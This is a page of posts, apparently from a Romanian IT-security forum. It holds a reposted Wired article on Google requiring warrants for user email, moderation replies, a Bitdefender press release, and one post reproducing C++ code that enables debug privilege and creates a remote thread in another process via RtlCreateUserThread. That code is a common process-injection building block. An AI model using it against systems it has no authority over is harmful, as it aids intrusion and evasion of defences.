    Google Tells Cops to Get Warrants for User E-Mail, Cloud Data By David Kravets 01.23.13 5:29 PM Google demands probable-cause, court-issued warrants to divulge the contents of Gmail and other cloud-stored documents to authorities in the United States — a startling revelation Wednesday that runs counter to federal law that does not always demand warrants. The development surfaced as Google publicly announced that more than two-thirds of the user data Google forwards to government agencies across the United States is handed over without a probable-cause warrant. A Google spokesman told Wired that the media giant demands that government agencies — from the locals to the feds — get a probable-cause warrant for content on its e-mail, Google Drive cloud storage and other platforms — despite the Electronic Communications Privacy Act allowing the government to access such customer data without a warrant if it’s stored on Google’s servers for more than 180 days. “Google requires an ECPA search warrant for contents of Gmail and other services based on the Fourth Amendment to the Constitution, which prevents unreasonable search and seizure,” Chris Gaither, a Google spokesman, said. Some of the customer data doled out without a warrant include names listed when creating Gmail accounts, the IP address from where the account was created, and where and what time a user signs in and out of an account. What’s more, Google hands over without warrants the IP address associated with a particular e-mail sent from a Gmail account or used to change the account password, in addition to the non-content portion of e-mail headers such as the “from,” “to” and “date” fields. It was not immediately known whether other ISPs are traveling Google’s path when it comes to demanding probable-cause warrants for all stored content. But Google can seemingly grant more privacy than the four corners of the law allows because there’s been a string of conflicting court opinions on whether warrants are required for data stored on third-party servers longer than 180 days. The Supreme Court has never weighed in on the topic — and the authorities are seemingly abiding by Google’s rules to avoid a high court showdown. The Electronic Communications Privacy Act of 1986, the relevant law in question, was adopted at a time when e-mail wasn’t stored on servers for a long time, but instead was held there briefly on its way to the recipient’s inbox. In the 1980s, e-mail more than 6 months old was assumed abandoned, and therefore ripe for the taking without a probable-cause warrant. That law is still on the books today, even as the advancement of technology has undermined its original theory. But clearly, changing the law to comport with Google’s interpretation has been met with unreceptive members of Congress. The Senate Judiciary Committee approved a measure last year mirroring Google’s interpretation, but the bill died a quiet death. Moves to change the law have been scuttled over and again. Google’s Transparency Report issued January 23, 2013. For now, under the letter of the ECPA law, the government only needs to show that it has “reasonable grounds to believe” e-mail and other documents stored in the cloud for more than 180 days would be useful to an investigation. Gaither, the Google spokesman, did not know when Google began demanding warrants. But there were two federal appellate decisions on the topic rendered 2010, one requiring a warrant for content and another saying federal judges had the discretion to demand one. Meantime, Google released Wednesday its so-called “Transparency Report” shedding light on government requests for data. Globally, the United States again ranked No. 1 in terms of demands for Google customer data. India, France, Germany, the United Kingdom and Brazil were trailing in that order. The figures for the first time provide a brief outline on whether data was handed over with or without a court warrant — a praiseworthy move we’ve been agitating for at Threat Level following the report’s inception. Google first began releasing its Transparency Report in 2009. Google offers e-mail, cloud storage, a blogging platform, a phone and texting platform, web search and other services. The data Google is coughing up to the authorities includes e-mail and text-messaging communications, cloud-stored documents and, among other things, browsing activity, and even IP addresses used to create an account. In all, agencies across the United States demanded 8,438 times that Google fork over data on some 14,791 accounts for the six-month period ending December 2012. Probable-cause search warrants were issued in 1,896 of the cases. Subpoenas, which require the government to assert that the data is relevant to an investigation, were issued 5,784 times. Google could not quantify the remaining 758. Google’s transparency data is limited as it does not include requests under the Patriot Act, which can include National Security Letters with gag orders attached. Nor do the data include anti-terrorism eavesdropping court orders known as FISA orders or any dragnet surveillance programs legalized in 2008, as those are secret, too. In all those instances, probable-cause warrants generally are not required, even for customer content stored in Google’s servers. Sursa: http://www.wired.com/threatlevel/2013/01/google-says-get-a-warrant/
  21. Nytro
    Discutiile specifice sistemelor de operare printre care si Linux se pot purta in categoria "Sisteme de operare". Tutorialele "Linux" pot fi dezvoltate in categoriile pentru Tutoriale, in limba romana, in limba engleza sau video. Termenul "securitate" este mult prea vast si in acelasi timp nu prezinta nimic concret. Prin "hack", sincer, nu inteleg ce vrei sa zici. Aici pot intra multe lucruri, de la comenzi tricky in shell scripting pana la exploit development - local privilege escalation exploits (dezvoltarea acestora). Pentru Tools, asa cum spuneai chiar tu, exista de asemenea 3 categorii speciale. Problema principala este faptul ca nu se poarta foarte multe discutii legate strict de sistemul de operare Linux. Mai bine zis, se vorbeste destul de putin despre Linux pe aici. In plus, eu as vrea sa evitam crearea unei categorii in care pot sa jur ca 90% dintre discutii ar fi despre Shitubuntu si ar fi probleme intampinate de utilizatorii acestui "colorat" sistem de operare Linux, mai exact ne-am abate de la tema forumului, securitatea IT, si am acoperi ceea ce acopera deja forumuri specializate.
  22. Nytro
    Nu. RST e o comunitate in care membri se ajuta reciproc. Mai exact unii ii ajuta pe altii, iar altii, ca tine, vin aici doar pentru nevoile personale, in cazul de fata sa cumpere/vanda ceva. Aici apar si posturile, dar aici apare si ceea ce poarta denumirea de "socializare". Altfel cumperi de la o persoana care te-a ajutat de la x ori decat de la cineva despre care nu stii nimic. Din posturi iti poti da seama atat de cunostintele tehnice ale unei persoane, cat si de modul in care gandeste. Mai exact, daca vezi pe cnv k scrye asha poti avea certitudinea ca nu e o persoana potrivita pentru a colabora.
  23. Nytro
    [h=1]Another example usage of RtlCreateUserThread[/h][h=3]Author: zwclose7[/h]This program create remote thread within another process using RtlCreateUserThread function. Instead of using GetProcAddress function to get the function address, it import the function from ntdll.dll directly. Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3784 #include <iostream> #include <Windows.h> using namespace std; typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID; EXTERN_C LONG WINAPI RtlCreateUserThread(HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN,ULONG, PULONG,PULONG, PVOID,PVOID, PHANDLE,PCLIENT_ID); EXTERN_C LONG WINAPI NtResumeThread(HANDLE ThreadHandle,PULONG SuspendCount); int main(){ HANDLE hThread; CLIENT_ID cid; DWORD PID,exts; PVOID para; char dll[60],func[60]; HANDLE hToken; LUID luid; LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid); TOKEN_PRIVILEGES tp; tp.Privileges[0].Luid=luid; tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; tp.PrivilegeCount=1; OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken); AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL); cout <<"==========Remote Thread Creator==========\n\n"; cout <<"This program create remote thread within another process using\nRtlCreateUserThread function. Instead of using\n"; cout <<"GetProcAddress function to get the function address, it import the function\n"; cout <<"from ntdll.dll directly.\n\n"; cout <<"Enter PID:"; cin >>PID; cout <<"Enter DLL name:"; cin >>dll; cout <<"Enter function name:"; cin >>func; cout <<"Enter parameter:"; cin >>para; HMODULE hModule=GetModuleHandle(dll); HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,false,PID); RtlCreateUserThread(hProcess,NULL,true,0,0,0,(PVOID)GetProcAddress(hModule,func),para,&hThread,&cid); cout <<"Thread created in suspended state. Press enter to resume it.\n\n"; system("pause"); NtResumeThread(hThread,NULL); WaitForSingleObject(hThread,INFINITE); GetExitCodeThread(hThread,&exts); cout <<"\n\nThread terminated with status code: "<<exts; CloseHandle(hThread); CloseHandle(hProcess); return 0; } Sursa: Another example usage of RtlCreateUserThread - rohitab.com - Forums
  24. Nytro
    [h=1]Bitdefender lanseaza aplicatia gratuita de scanare a PC-urilor 60-Second Virus Scanner[/h] BUCURE?TI, 23 ianuarie 2013– Bitdefender, liderul pie?ei locale de antivirus, lanseaz? aplica?ia gratuit? 60-Second Virus Scanner ce furnizeaz? oric?rui utilizator protec?ie suplimentar? prin intermediul unei tehnologii bazate pe cloud, ce informeaz? asupra tuturor amenin??rilor active. Bitdefender 60-Second Virus Scanner ofer? tuturor utilizatorilor de PC siguran?a c? sistemul lor este verificat de o tehnologie proactiv? de scanare care este disponibil? gratuit oricând. Tehnologia Bitdefender s-a clasat în mod constant pe primul loc în testele de detec?ie realizate de institutele independente de testare a produselor antivirus AV-Test ?i AV-Comparatives. ’’Cu 60-Second Virus Scanner ne propunem s? aducem tehnologia noastr? de top pe cât mai multe calculatoare. Suntem convin?i c? va impresiona utilizatorii de PC-uri prin eficien?? ?i modul discret de func?ionare. Ne a?tept?m ca aplica?ia gratuit? s? fie folosit? de foarte mul?i dintre cei care folosesc deja un ativirus, dar î?i doresc s? afle dac? dac? solu?ia blocheaz? toate amenin??rile informatice’’, a declarat C?t?lin Co?oi, Chief Security Strategist, Bitdefender. Aplica?ia func?ioneaz? concomitent cu orice alt program antivirus, permi?ând utilizatorilor s? verifice dac? softul de securitate î?i face bine treaba. 60-Second Virus Scanner lucreaz? în mod discret, protejeaz? sistemul în timp ce utilizatorii lucreaz? sau se joac? ?i trimite alerte ]n timp real pe m?sur? ce detecteaz? viru?i. Tehnologia bazat? pe cloud nu are niciun impact asupra sistemului din punct de vedere al consumului de resurse. Download: http://download.bitdefender.com/npd/60Second/60Second_ro_ro.exe Sursa: Bitdefender lanseaza aplicatia gratuita de scanare a PC-urilor 60-Second Virus Scanner
  25. Nytro
    Erau 100.000 de posturi.
×
×
  • Create New...